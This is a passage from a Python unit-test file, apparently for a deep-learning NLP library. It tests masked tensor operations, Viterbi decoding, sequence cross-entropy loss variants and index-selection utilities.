vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.01321289, 0.0, 0.26538793, 0.72139918]])
)
# Testing the masked 1D case where the input is all 0s and the mask
# is not all 0s.
vector_1d = torch.FloatTensor([[0.0, 0.0, 0.0, 0.0]])
mask_1d = torch.tensor([[False, False, False, True]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert_array_almost_equal(
numpy.exp(vector_1d_softmaxed), numpy.array([[0.0, 0.0, 0.0, 1.0]])
)
# Testing the masked 1D case where the input is not all 0s
# and the mask is all 0s. The output here will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([[0.0, 2.0, 3.0, 4.0]])
mask_1d = torch.tensor([[False, False, False, False]])
vector_1d_softmaxed = util.masked_log_softmax(vector_1d, mask_1d).data.numpy()
assert not numpy.isnan(vector_1d_softmaxed).any()
def test_masked_max(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([True, False, True])
vector_1d_maxed = util.masked_max(vector_1d, mask_1d, dim=0).data.numpy()
assert_array_almost_equal(vector_1d_maxed, 5.0)
# Testing if all masks are zero, the output will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([False, False, False])
vector_1d_maxed = util.masked_max(vector_1d, mask_1d, dim=0).data.numpy()
assert not numpy.isnan(vector_1d_maxed).any()
# Testing batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_maxed = util.masked_max(matrix, mask, dim=-1).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([5.0, -1.0]))
# Testing keepdim for batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_maxed = util.masked_max(matrix, mask, dim=-1, keepdim=True).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([[5.0], [-1.0]]))
# Testing broadcast
matrix = torch.FloatTensor(
[[[1.0, 2.0], [12.0, 3.0], [5.0, -1.0]], [[-1.0, -3.0], [-2.0, -0.5], [3.0, 8.0]]]
)
mask = torch.tensor([[True, False, True], [True, True, False]]).unsqueeze(-1)
matrix_maxed = util.masked_max(matrix, mask, dim=1).data.numpy()
assert_array_almost_equal(matrix_maxed, numpy.array([[5.0, 2.0], [-1.0, -0.5]]))
def test_masked_mean(self):
# Testing the general masked 1D case.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([True, False, True])
vector_1d_mean = util.masked_mean(vector_1d, mask_1d, dim=0).data.numpy()
assert_array_almost_equal(vector_1d_mean, 3.0)
# Testing if all masks are zero, the output will be arbitrary, but it should not be nan.
vector_1d = torch.FloatTensor([1.0, 12.0, 5.0])
mask_1d = torch.tensor([False, False, False])
vector_1d_mean = util.masked_mean(vector_1d, mask_1d, dim=0).data.numpy()
assert not numpy.isnan(vector_1d_mean).any()
# Testing batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_mean = util.masked_mean(matrix, mask, dim=-1).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([3.0, -1.5]))
# Testing keepdim for batch value and batch masks
matrix = torch.FloatTensor([[1.0, 12.0, 5.0], [-1.0, -2.0, 3.0]])
mask = torch.tensor([[True, False, True], [True, True, False]])
matrix_mean = util.masked_mean(matrix, mask, dim=-1, keepdim=True).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([[3.0], [-1.5]]))
# Testing broadcast
matrix = torch.FloatTensor(
[[[1.0, 2.0], [12.0, 3.0], [5.0, -1.0]], [[-1.0, -3.0], [-2.0, -0.5], [3.0, 8.0]]]
)
mask = torch.tensor([[True, False, True], [True, True, False]]).unsqueeze(-1)
matrix_mean = util.masked_mean(matrix, mask, dim=1).data.numpy()
assert_array_almost_equal(matrix_mean, numpy.array([[3.0, 0.5], [-1.5, -1.75]]))
def test_masked_flip(self):
tensor = torch.FloatTensor(
[[[6, 6, 6], [1, 1, 1], [2, 2, 2]], [[3, 3, 3], [4, 4, 4], [5, 5, 5]]]
)
solution = [[[6, 6, 6], [0, 0, 0]], [[4, 4, 4], [3, 3, 3]]]
response = util.masked_flip(tensor, [1, 2])
assert_almost_equal(response, solution)
tensor = torch.FloatTensor(
[
[[6, 6, 6], [1, 1, 1], [2, 2, 2], [0, 0, 0]],
[[3, 3, 3], [4, 4, 4], [5, 5, 5], [1, 2, 3]],
]
)
solution = [
[[2, 2, 2], [1, 1, 1], [6, 6, 6], [0, 0, 0]],
[[1, 2, 3], [5, 5, 5], [4, 4, 4], [3, 3, 3]],
]
response = util.masked_flip(tensor, [3, 4])
assert_almost_equal(response, solution)
tensor = torch.FloatTensor(
[
[[6, 6, 6], [1, 1, 1], [2, 2, 2], [0, 0, 0]],
[[3, 3, 3], [4, 4, 4], [5, 5, 5], [1, 2, 3]],
[[1, 1, 1], [2, 2, 2], [0, 0, 0], [0, 0, 0]],
]
)
solution = [
[[2, 2, 2], [1, 1, 1], [6, 6, 6], [0, 0, 0]],
[[1, 2, 3], [5, 5, 5], [4, 4, 4], [3, 3, 3]],
[[2, 2, 2], [1, 1, 1], [0, 0, 0], [0, 0, 0]],
]
response = util.masked_flip(tensor, [3, 4, 2])
assert_almost_equal(response, solution)
def test_get_text_field_mask_returns_a_correct_mask(self):
text_field_tensors = {
"indexer_name": {
"tokens": torch.LongTensor([[3, 4, 5, 0, 0], [1, 2, 0, 0, 0]]),
"token_characters": torch.LongTensor(
[
[[1, 2], [3, 0], [2, 0], [0, 0], [0, 0]],
[[5, 0], [4, 6], [0, 0], [0, 0], [0, 0]],
]
),
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(),
[[1, 1, 1, 0, 0], [1, 1, 0, 0, 0]],
)
def test_get_text_field_mask_returns_a_correct_mask_character_only_input(self):
text_field_tensors = {
"indexer_name": {
"token_characters": torch.LongTensor(
[
[[1, 2, 3], [3, 0, 1], [2, 1, 0], [0, 0, 0]],
[[5, 5, 5], [4, 6, 0], [0, 0, 0], [0, 0, 0]],
]
)
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(),
[[1, 1, 1, 0], [1, 1, 0, 0]],
)
def test_get_text_field_mask_returns_a_correct_mask_list_field(self):
text_field_tensors = {
"indexer_name": {
"list_tokens": torch.LongTensor(
[
[[1, 2], [3, 0], [2, 0], [0, 0], [0, 0]],
[[5, 0], [4, 6], [0, 0], [0, 0], [0, 0]],
]
)
}
}
actual_mask = (
util.get_text_field_mask(text_field_tensors, num_wrapping_dims=1).long().numpy()
)
expected_mask = (text_field_tensors["indexer_name"]["list_tokens"].numpy() > 0).astype(
"int32"
)
assert_almost_equal(actual_mask, expected_mask)
def test_get_text_field_mask_returns_mask_key(self):
text_field_tensors = {
"indexer_name": {
"tokens": torch.LongTensor([[3, 4, 5, 0, 0], [1, 2, 0, 0, 0]]),
"mask": torch.tensor([[False, False, True]]),
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(), [[0, 0, 1]]
)
def test_weighted_sum_works_on_simple_input(self):
batch_size = 1
sentence_length = 5
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, sentence_length, embedding_dim)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.FloatTensor([[0.3, 0.4, 0.1, 0, 1.2]])
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, embedding_dim)
expected_array = (
0.3 * sentence_array[0, 0]
+ 0.4 * sentence_array[0, 1]
+ 0.1 * sentence_array[0, 2]
+ 0.0 * sentence_array[0, 3]
+ 1.2 * sentence_array[0, 4]
)
numpy.testing.assert_almost_equal(aggregated_array, [expected_array], decimal=5)
def test_weighted_sum_handles_higher_order_input(self):
batch_size = 1
length_1 = 5
length_2 = 6
length_3 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_1, length_2, length_3, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2, length_3)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, length_2, embedding_dim)
expected_array = (
attention_array[0, 3, 2, 0] * sentence_array[0, 3, 2, 0]
+ attention_array[0, 3, 2, 1] * sentence_array[0, 3, 2, 1]
)
numpy.testing.assert_almost_equal(aggregated_array[0, 3, 2], expected_array, decimal=5)
def test_weighted_sum_handles_uneven_higher_order_input(self):
batch_size = 1
length_1 = 5
length_2 = 6
length_3 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_3, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2, length_3)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, length_2, embedding_dim)
for i in range(length_1):
for j in range(length_2):
expected_array = (
attention_array[0, i, j, 0] * sentence_array[0, 0]
+ attention_array[0, i, j, 1] * sentence_array[0, 1]
)
numpy.testing.assert_almost_equal(
aggregated_array[0, i, j], expected_array, decimal=5
)
def test_weighted_sum_handles_3d_attention_with_3d_matrix(self):
batch_size = 1
length_1 = 5
length_2 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_2, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, embedding_dim)
for i in range(length_1):
expected_array = (
attention_array[0, i, 0] * sentence_array[0, 0]
+ attention_array[0, i, 1] * sentence_array[0, 1]
)
numpy.testing.assert_almost_equal(aggregated_array[0, i], expected_array, decimal=5)
def test_viterbi_decode(self):
# Test Viterbi decoding is equal to greedy decoding with no pairwise potentials.
sequence_logits = torch.nn.functional.softmax(torch.rand([5, 9]), dim=-1)
transition_matrix = torch.zeros([9, 9])
indices, _ = util.viterbi_decode(sequence_logits.data, transition_matrix)
_, argmax_indices = torch.max(sequence_logits, 1)
assert indices == argmax_indices.data.squeeze().tolist()
# Test Viterbi decoding works with start and end transitions
sequence_logits = torch.nn.functional.softmax(torch.rand([5, 9]), dim=-1)
transition_matrix = torch.zeros([9, 9])
allowed_start_transitions = torch.zeros([9])
# Force start tag to be an 8
allowed_start_transitions[:8] = float("-inf")
allowed_end_transitions = torch.zeros([9])
# Force end tag to be a 0
allowed_end_transitions[1:] = float("-inf")
indices, _ = util.viterbi_decode(
sequence_logits.data,
transition_matrix,
allowed_end_transitions=allowed_end_transitions,
allowed_start_transitions=allowed_start_transitions,
)
assert indices[0] == 8
assert indices[-1] == 0
# Test that pairwise potentials affect the sequence correctly and that
# viterbi_decode can handle -inf values.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 3, 5],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
]
)
# The same tags shouldn't appear sequentially.
transition_matrix = torch.zeros([5, 5])
for i in range(5):
transition_matrix[i, i] = float("-inf")
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [4, 3, 4, 3, 4, 3]
# Test that unbalanced pairwise potentials break ties
# between paths with equal unary potentials.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to the 4th tag, making the best
# path uniquely to take the 4th tag only.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -10
transition_matrix[3, 4] = -10
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [3, 3, 3, 3, 3, 3]
sequence_logits = torch.FloatTensor([[1, 0, 0, 4], [1, 0, 6, 2], [0, 3, 0, 4]])
# Best path would normally be [3, 2, 3] but we add a
# potential from 2 -> 1, making [3, 2, 1] the best path.
transition_matrix = torch.zeros([4, 4])
transition_matrix[0, 0] = 1
transition_matrix[2, 1] = 5
indices, value = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [3, 2, 1]
assert value.numpy() == 18
# Test that providing evidence results in paths containing specified tags.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to the 4th tag, making the best
# path to take the 4th tag for every label.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -2
transition_matrix[3, 4] = -2
# The 1st, 4th and 5th sequence elements are observed - they should be
# equal to 2, 0 and 4. The last tag should be equal to 3, because although
# the penalty for transitioning to the 4th tag is -2, the unary potential
# is 7, which is greater than the combination for any of the other labels.
observations = [2, -1, -1, 0, 4, -1]
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, observations)
assert indices == [2, 3, 3, 0, 4, 3]
def test_viterbi_decode_top_k(self):
# Test cases taken from: https://gist.github.com/PetrochukM/afaa3613a99a8e7213d2efdd02ae4762
# Test Viterbi decoding is equal to greedy decoding with no pairwise potentials.
sequence_logits = torch.autograd.Variable(torch.rand([5, 9]))
transition_matrix = torch.zeros([9, 9])
indices, _ = util.viterbi_decode(sequence_logits.data, transition_matrix, top_k=5)
_, argmax_indices = torch.max(sequence_logits, 1)
assert indices[0] == argmax_indices.data.squeeze().tolist()
# Test that pairwise potentials effect the sequence correctly and that
# viterbi_decode can handle -inf values.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
]
)
# The same tags shouldn't appear sequentially.
transition_matrix = torch.zeros([5, 5])
for i in range(5):
transition_matrix[i, i] = float("-inf")
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 4, 3, 4, 3, 4]
# Test that unbalanced pairwise potentials break ties
# between paths with equal unary potentials.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 0],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to the 4th tag, making the best
# path uniquely to take the 4th tag only.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -10
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 3, 3, 3, 3, 3]
sequence_logits = torch.FloatTensor([[1, 0, 0, 4], [1, 0, 6, 2], [0, 3, 0, 4]])
# Best path would normally be [3, 2, 3] but we add a
# potential from 2 -> 1, making [3, 2, 1] the best path.
transition_matrix = torch.zeros([4, 4])
transition_matrix[0, 0] = 1
transition_matrix[2, 1] = 5
indices, value = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 2, 1]
assert value[0] == 18
def _brute_decode(
tag_sequence: torch.Tensor, transition_matrix: torch.Tensor, top_k: int = 5
) -> Any:
"""
Top-k decoder that uses brute search instead of the Viterbi Decode dynamic programing algorithm
"""
# Create all possible sequences
sequences = [[]] # type: ignore
for i in range(len(tag_sequence)):
new_sequences = [] # type: ignore
for j in range(len(tag_sequence[i])):
for sequence in sequences:
new_sequences.append(sequence[:] + [j])
sequences = new_sequences
# Score
scored_sequences = [] # type: ignore
for sequence in sequences:
emission_score = sum(tag_sequence[i, j] for i, j in enumerate(sequence))
transition_score = sum(
transition_matrix[sequence[i - 1], sequence[i]] for i in range(1, len(sequence))
)
score = emission_score + transition_score
scored_sequences.append((score, sequence))
# Get the top k scores / paths
top_k_sequences = sorted(scored_sequences, key=lambda r: r[0], reverse=True)[:top_k]
scores, paths = zip(*top_k_sequences)
return paths, scores # type: ignore
# Run 100 randomly generated parameters and compare the outputs.
for i in range(100):
num_tags = random.randint(1, 5)
seq_len = random.randint(1, 5)
k = random.randint(1, 5)
sequence_logits = torch.rand([seq_len, num_tags])
transition_matrix = torch.rand([num_tags, num_tags])
viterbi_paths_v1, viterbi_scores_v1 = util.viterbi_decode(
sequence_logits, transition_matrix, top_k=k
)
viterbi_path_brute, viterbi_score_brute = _brute_decode(
sequence_logits, transition_matrix, top_k=k
)
numpy.testing.assert_almost_equal(
list(viterbi_score_brute), viterbi_scores_v1.tolist(), decimal=3
)
numpy.testing.assert_equal(sanitize(viterbi_paths_v1), viterbi_path_brute)
def test_sequence_cross_entropy_with_logits_masks_loss_correctly(self):
# test weight masking by checking that a tensor with non-zero values in
# masked positions returns the same loss as a tensor with zeros in those
# positions.
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
tensor2 = tensor.clone()
tensor2[0, 3:, :] = 2
tensor2[1, 4:, :] = 13
tensor2[2, 2:, :] = 234
tensor2[3, :, :] = 65
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights)
loss2 = util.sequence_cross_entropy_with_logits(tensor2, targets, weights)
assert loss.data.numpy() == loss2.data.numpy()
def test_sequence_cross_entropy_with_logits_smooths_labels_correctly(self):
tensor = torch.rand([1, 3, 4])
targets = torch.LongTensor(numpy.random.randint(0, 3, [1, 3]))
weights = torch.ones([2, 3])
loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, label_smoothing=0.1
)
correct_loss = 0.0
for prediction, label in zip(tensor.squeeze(0), targets.squeeze(0)):
prediction = torch.nn.functional.log_softmax(prediction, dim=-1)
correct_loss += prediction[label] * 0.9
# incorrect elements
correct_loss += prediction.sum() * 0.1 / 4
# Average over sequence.
correct_loss = -correct_loss / 3
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_averages_batch_correctly(self):
# test batch average is the same as dividing the batch averaged
# loss by the number of batches containing any non-padded tokens.
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights)
vector_loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, average=None
)
# Batch has one completely padded row, so divide by 4.
assert loss.data.numpy() == vector_loss.sum().item() / 4
@flaky(max_runs=3, min_passes=1)
def test_sequence_cross_entropy_with_logits_averages_token_correctly(self):
# test token average is the same as multiplying the per-batch loss
# with the per-batch weights and dividing by the total weight
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, average="token")
vector_loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, average=None
)
total_token_loss = (vector_loss * weights.float().sum(dim=-1)).sum()
average_token_loss = (total_token_loss / weights.float().sum()).detach()
assert_almost_equal(loss.detach().item(), average_token_loss.item(), decimal=5)
def test_sequence_cross_entropy_with_logits_gamma_correctly(self):
batch = 1
length = 3
classes = 4
gamma = abs(numpy.random.randn()) # [0, +inf)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, gamma=gamma)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
p = torch.nn.functional.softmax(logit, dim=-1)
pt = p[label]
ft = (1 - pt) ** gamma
correct_loss += -pt.log() * ft
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_alpha_float_correctly(self):
batch = 1
length = 3
classes = 2 # alpha float for binary class only
alpha = (
numpy.random.rand() if numpy.random.rand() > 0.5 else (1.0 - numpy.random.rand())
) # [0, 1]
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
if label:
at = alpha
else:
at = 1 - alpha
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_alpha_single_float_correctly(self):
batch = 1
length = 3
classes = 2 # alpha float for binary class only
alpha = (
numpy.random.rand() if numpy.random.rand() > 0.5 else (1.0 - numpy.random.rand())
) # [0, 1]
alpha = torch.tensor(alpha)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
if label:
at = alpha
else:
at = 1 - alpha
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_alpha_list_correctly(self):
batch = 1
length = 3
classes = 4 # alpha float for binary class only
alpha = abs(numpy.random.randn(classes)) # [0, +inf)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
at = alpha[label]
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_replace_masked_values_replaces_masked_values_with_finite_value(self):
tensor = torch.FloatTensor([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]])
mask = torch.tensor([[True, True, False]])
replaced = util.replace_masked_values(tensor, mask.unsqueeze(-1), 2).data.numpy()
assert_almost_equal(replaced, [[[1, 2, 3, 4], [5, 6, 7, 8], [2, 2, 2, 2]]])
def test_logsumexp(self):
# First a simple example where we add probabilities in log space.
tensor = torch.FloatTensor([[0.4, 0.1, 0.2]])
log_tensor = tensor.log()
log_summed = util.logsumexp(log_tensor, dim=-1, keepdim=False)
assert_almost_equal(log_summed.exp().data.numpy(), [0.7])
log_summed = util.logsumexp(log_tensor, dim=-1, keepdim=True)
assert_almost_equal(log_summed.exp().data.numpy(), [[0.7]])
# Then some more atypical examples, and making sure this will work with how we handle
# log masks.
tensor = torch.FloatTensor([[float("-inf"), 20.0]])
assert_almost_equal(util.logsumexp(tensor).data.numpy(), [20.0])
tensor = torch.FloatTensor([[-200.0, 20.0]])
assert_almost_equal(util.logsumexp(tensor).data.numpy(), [20.0])
tensor = torch.FloatTensor([[20.0, 20.0], [-200.0, 200.0]])
assert_almost_equal(util.logsumexp(tensor, dim=0).data.numpy(), [20.0, 200.0])
def test_flatten_and_batch_shift_indices(self):
indices = numpy.array(
[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 9, 9, 9]], [[2, 1, 0, 7], [7, 7, 2, 3], [0, 0, 4, 2]]]
)
indices = torch.tensor(indices, dtype=torch.long)
shifted_indices = util.flatten_and_batch_shift_indices(indices, 10)
numpy.testing.assert_array_equal(
shifted_indices.data.numpy(),
numpy.array(
[1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 9, 12, 11, 10, 17, 17, 17, 12, 13, 10, 10, 14, 12]
),
)
def test_batched_index_select(self):
indices = numpy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])
# Each element is a vector of its index.
targets = torch.ones([2, 10, 3]).cumsum(1) - 1
# Make the second batch double its index so they're different.
targets[1, :, :] *= 2
indices = torch.tensor(indices, dtype=torch.long)
selected = util.batched_index_select(targets, indices)
assert list(selected.size()) == [2, 2, 2, 3]
ones = numpy.ones([3])
numpy.testing.assert_array_equal(selected[0, 0, 0, :].data.numpy(), ones)
numpy.testing.assert_array_equal(selected[0, 0, 1, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[0, 1, 0, :].data.numpy(), ones * 3)
numpy.testing.assert_array_equal(selected[0, 1, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 0, 0, :].data.numpy(), ones * 10)
numpy.testing.assert_array_equal(selected[1, 0, 1, :].data.numpy(), ones * 12)
numpy.testing.assert_array_equal(selected[1, 1, 0, :].data.numpy(), ones * 14)
numpy.testing.assert_array_equal(selected[1, 1, 1, :].data.numpy(), ones * 16)
indices = numpy.array([[[1, 11], [3, 4]], [[5, 6], [7, 8]]])
indices = torch.tensor(indices, dtype=torch.long)
with pytest.raises(ConfigurationError):
util.batched_index_select(targets, indices)
indices = numpy.array([[[1, -1], [3, 4]], [[5, 6], [7, 8]]])
indices = torch.tensor(indices, dtype=torch.long)
with pytest.raises(ConfigurationError):
util.batched_index_select(targets, indices)
def test_batched_span_select(self):
# Each element is a vector of its index.
targets = torch.ones([3, 12, 2]).cumsum(1) - 1
spans = torch.LongTensor(
[
[[0, 0], [1, 2], [5, 8], [10, 10]],
[[i, i] for i in range(3, -1, -1)],
[[0, 3], [1, 4], [2, 5], [10, 11]],
]
)
selected, mask = util.batched_span_select(targets, spans)
selected = torch.where(mask.unsqueeze(-1), selected, torch.empty_like(selected).fill_(-1))
numpy.testing.assert_array_equal(
selected,
[
[
[[0, 0], [-1, -1], [-1, -1], [-1, -1]],
[[2, 2], [1, 1], [-1, -1], [-1, -1]],
[[8, 8], [7, 7], [6, 6], [5, 5]],
[[10, 10], [-1, -1], [-1, -1], [-1, -1]],
],
[[[i, i], [-1, -1], [-1, -1], [-1, -1]] for i in range(3, -1, -1)],
[
[[3, 3], [2, 2], [1, 1], [0, 0]],
[[4, 4], [3, 3], [2, 2], [1, 1]],
[[5, 5], [4, 4], [3, 3], [2, 2]],
[[11, 11], [10, 10], [-1, -1], [-1, -1]],
],
],
)
def test_flattened_index_select(self):
indices = numpy.array([[1, 2], [3, 4]])
targets = torch.ones([2, 6, 3]).cumsum(1) - 1
# Make the second batch double its index so they're different.
targets[1, :, :] *= 2
indices = torch.tensor(indices, dtype=torch.long)
selected = util.flattened_index_select(targets, indices)
assert list(selected.size()) == [2, 2, 2, 3]
ones = numpy.ones([3])
numpy.testing.assert_array_equal(selected[0, 0, 0, :].data.numpy(), ones)
numpy.testing.assert_array_equal(selected[0, 0, 1, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[0, 1, 0, :].data.numpy(), ones * 3)
numpy.testing.assert_array_equal(selected[0, 1, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 0, 0, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[1, 0, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 1, 0, :].data.numpy(), ones * 6)
numpy.testing.assert_array_equal(selected[1, 1, 1, :].data.numpy(), ones * 8)
# Check we only accept 2D indices.
with pytest.raises(ConfigurationError):
util.flattened_index_select(targets, torch.ones([3, 4, 5]))
def test_bucket_values(self):
indices = torch.LongTensor([1, 2, 7, 1, 56, 900])
bucketed_distances = util.bucket_values(indices)
numpy.testing.assert_array_equal(
bucketed_distances.numpy(), numpy.array([1, 2, 5, 1, 8, 9])
)
def test_add_sentence_boundary_token_ids_handles_2D_input(self):
tensor = torch.from_numpy(numpy.array([[1, 2, 3], [4, 5, 0]]))
mask = tensor > 0
bos = 9
eos = 10
new_tensor, new_mask = util.add_sentence_boundary_token_ids(tensor, mask, bos, eos)
expected_new_tensor = numpy.array([[9, 1, 2, 3, 10], [9, 4, 5, 10, 0]])
assert (new_tensor.data.numpy() == expected_new_tensor).all()
assert (new_mask.data.numpy() == (expected_new_tensor > 0)).all()
def test_add_sentence_boundary_token_ids_handles_3D_input(self):
tensor = torch.from_numpy(
numpy.array(
[
